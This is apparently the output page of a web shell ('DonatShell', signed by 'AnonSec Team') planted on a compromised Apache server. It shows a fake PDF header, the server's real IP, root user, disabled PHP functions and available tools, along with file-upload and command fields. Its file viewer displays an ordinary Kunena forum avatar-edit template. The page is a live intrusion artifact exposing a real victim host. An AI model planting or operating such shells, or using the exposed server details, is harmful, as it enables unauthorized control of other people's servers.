%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 49.231.201.246  /  Your IP : 216.73.216.149
Web Server : Apache/2.4.18 (Ubuntu)
System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
User : root ( 0)
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/11585/cwd/html/old/components/com_kunena/template/blue_eagle/html/user/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/11585/cwd/html/old/components/com_kunena/template/blue_eagle/html/user/edit_avatar.php
<?php
/**
 * Kunena Component
 * @package Kunena.Template.Blue_Eagle
 * @subpackage User
 *
 * @copyright (C) 2008 - 2014 Kunena Team. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
 * @link http://www.kunena.org
 **/
defined ( '_JEXEC' ) or die ();

$i=0;
?>

<div class="kblock keditavatar">
	<div class="kheader">
		<h2><span><?php echo JText::_('COM_KUNENA_PROFILE_EDIT_AVATAR_TITLE'); ?></span></h2>
	</div>
	<div class="kcontainer">
		<div class="kbody">
<table>
<?php if ($this->profile->avatar): ?>
		<tr class="krow<?php echo ($i^=1)+1;?>">
			<td class="kcol-first">
			<label for="kavatar-keep"><?php echo JText::_('COM_KUNENA_PROFILE_AVATAR_KEEP');?></label>
		</td>
		<td class="kcol-mid">
			<input id="kavatar-keep" type="radio" name="avatar" value="keep" checked="checked" />
		</td>
	</tr>
		<tr class="krow<?php echo ($i^=1)+1;?>">
			<td class="kcol-first">
			<label for="kavatar-delete"><?php echo JText::_('COM_KUNENA_PROFILE_AVATAR_DELETE');?></label>
		</td>
		<td class="kcol-mid">
			<input id="kavatar-delete" type="radio" name="avatar" value="delete" />
		</td>
	</tr>
<?php endif; ?>
<?php if ($this->config->allowavatarupload):?>
		<tr class="krow<?php echo ($i^=1)+1;?>">
			<td class="kcol-first">
			<label for="kavatar-upload"><?php echo JText::_('COM_KUNENA_PROFILE_AVATAR_UPLOAD');?></label>
			</td><td class="kcol-mid">
			<div><input id="kavatar-upload" type="file" class="button" name="avatarfile" /></div>
		</td>
	</tr>
<?php endif; ?>
<?php if ($this->config->allowavatargallery && $this->galleries):?>
		<tr class="krow<?php echo ($i^=1)+1;?>">
			<td class="kcol-first">
			<label><?php echo JText::_('COM_KUNENA_PROFILE_AVATAR_GALLERY');?></label>
		</td>
		<td class="kcol-mid">
			<table class="kblocktable" id ="kforumua_gal">
				<tr>
					<td class="kuadesc"><?php echo $this->galleries; ?></td>
				</tr>
				<tr>
					<td id="kgallery_avatar_list" class="kuadesc">
					<?php
					$kid = 0;
					foreach ($this->galleryimg as $avatarimg) : ?>
					<span>
						<label for="kavatar<?php echo $kid ?>"><img src="<?php echo $this->galleryurl .'/'. ($this->gallery ? $this->gallery.'/':'') . $avatarimg ?>" alt="" /></label>
						<input id="kavatar<?php echo $kid ?>" type="radio" name="avatar" value="<?php echo 'gallery/' . ($this->gallery ? $this->gallery.'/':'') . $avatarimg ?>"/>
					</span>
					<?php $kid++; endforeach; ?>
					</td>
				</tr>
			</table>
		</td>
	</tr>
	<div>
		<?php foreach($this->galleryImagesList as $name=>$gallery): ?>
			<input type="hidden" id="Kunena_<?php echo $name ?>" name="<?php echo $name ?>" value='<?php echo $gallery ?>' />
		<?php endforeach; ?>
		<input type="hidden" id="Kunena_Image_Gallery_URL" name="Kunena_Image_Gallery_URL" value="<?php echo JURI::root().'media/kunena/avatars/gallery' ?>" />
	</div>
<?php endif; ?>
</table>
		</div>
	</div>
</div>

Anon7 - 2022
AnonSec Team